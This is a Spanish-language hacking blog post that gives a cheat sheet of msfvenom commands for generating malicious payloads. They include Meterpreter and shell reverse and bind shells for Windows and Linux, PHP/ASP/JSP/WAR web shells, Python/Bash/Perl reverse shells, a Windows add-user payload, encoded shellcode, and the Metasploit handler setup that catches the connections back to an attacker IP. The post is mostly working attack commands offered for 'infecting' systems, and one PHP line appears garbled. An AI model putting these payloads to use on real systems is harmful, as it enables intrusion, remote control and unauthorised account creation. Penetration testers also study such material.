Register Now

Login

Lost Password

Lost your password? Please enter your email address. You will receive a link and will create a new password via email.

Captcha Click on image to update the captcha .

Add post

You must login to add post .

Login

Register Now

Lorem ipsum dolor sit amet, consectetur adipiscing elit.Morbi adipiscing gravdio, sit amet suscipit risus ultrices eu.Fusce viverra neque at purus laoreet consequa.Vivamus vulputate posuere nisl quis consequat.

Msfvenom, creando diferentes tipos de payloads

Msfvenom, creando diferentes tipos de payloads

Difunde No Solo Hacking!

En el curso de hacking con Metasploit, veíamos cómo usar msfvenom para infectar distintos sistemas operativos. A continuación os dejo una lista de payloads que podéis generar para los distintos entornos.

# Crear un payload
msfvenom -p [payload] LHOST=[IPAtacante] LPORT=[PuertoEscucha]

# Listar payloads
msfvenom -l payloads

# Listar opciones de payloads
msfvenom -p [payload] --list-options
msfvenom -p windows/x64/meterpreter_reverse_tcp --list-options

# Crear un payload encodeado
msfvenom -p [payload] -e [encoder] -f [FormatoSalida] -i [iteración]  > ArchivoResultante

# Crear un payload usando una plantilla
msfvenom -p [payload]  -x [Plantilla] -f [FormatoSalida] > ArchivoResultante

# Poner a la escucha Payloads en Metasploit:
msf6>use exploit/multi/handler  
msf6>set payload windows/meterpreter/reverse_tcp  
msf6>set lhost [IP]  
msf6>set lport  [Puerto] 
msf6> set ExitOnSession false  
msf6>exploit -j  

#  Payloads para Windows 
msfvenom -p windows/meterpreter/reverse_tcp LHOST=[IPAtacante] LPORT=[PuertoEscucha] -f exe > shell.exe    
msfvenom -p windows/meterpreter_reverse_http LHOST=[IPAtacante] LPORT=[PuertoEscucha] HttpUserAgent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36" -f exe > shell.exe    
msfvenom -p windows/meterpreter/bind_tcp RHOST=[IPRemota] LPORT=[PuertoEscucha] -f exe > shell.exe    
msfvenom -p windows/shell/reverse_tcp LHOST=[IPAtacante] LPORT=[PuertoEscucha] -f exe > shell.exe    
msfvenom -p windows/shell_reverse_tcp LHOST=[IPAtacante] LPORT=[PuertoEscucha] -f exe > shell.exe

#  Payloads para Linux 
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=[IPAtacante] LPORT=[PuertoEscucha] -f elf > shell.elf    
msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=[IPRemota] LPORT=[PuertoEscucha] -f elf > shell.elf    
msfvenom -p linux/x64/shell_bind_tcp RHOST=[IPRemota] LPORT=[PuertoEscucha] -f elf > shell.elf    
msfvenom -p linux/x64/shell_reverse_tcp RHOST=[IPRemota] LPORT=[PuertoEscucha] -f elf > shell.elf

# Add a user in windows with msfvenom: 
msfvenom -p windows/adduser USER=[usuario] PASS=[password] -f exe > adduser.exe

#  Generar Web Payloads

# PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=[IPAtacante] LPORT=[PuertoEscucha] -f raw > shell.php
cat shell.php | pbcopy && echo ' shell.php && pbpaste >> shell.php

# ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=[IPAtacante] LPORT=[PuertoEscucha] -f asp > shell.asp

# JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=[IPAtacante] LPORT=[PuertoEscucha] -f raw > shell.jsp

# WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=[IPAtacante] LPORT=[PuertoEscucha] -f war > shell.war

#  Payloads en formato script 

# Lenguaje Python
msfvenom -p cmd/unix/reverse_python LHOST=[IPAtacante] LPORT=[PuertoEscucha] -f raw > shell.py

# Lenguaje Bash
msfvenom -p cmd/unix/reverse_bash LHOST=[IPAtacante] LPORT=[PuertoEscucha] -f raw > shell.sh

# Lenguaje Perl
msfvenom -p cmd/unix/reverse_perl LHOST=[IPAtacante] LPORT=[PuertoEscucha] -f raw > shell.pl

# Crear un payload encodeado borrando los caracteres malos:
msfvenom -p windows/shell_reverse_tcp EXITFUNC=process LHOST=[IPAtacante] LPORT=[PuertoEscucha] -f c -e x86/shikata_ga_nai -b "\x0A\x0D"


Difunde No Solo Hacking!

About Carlos Melantuche


Follow Me

Leave a reply

error: ooops!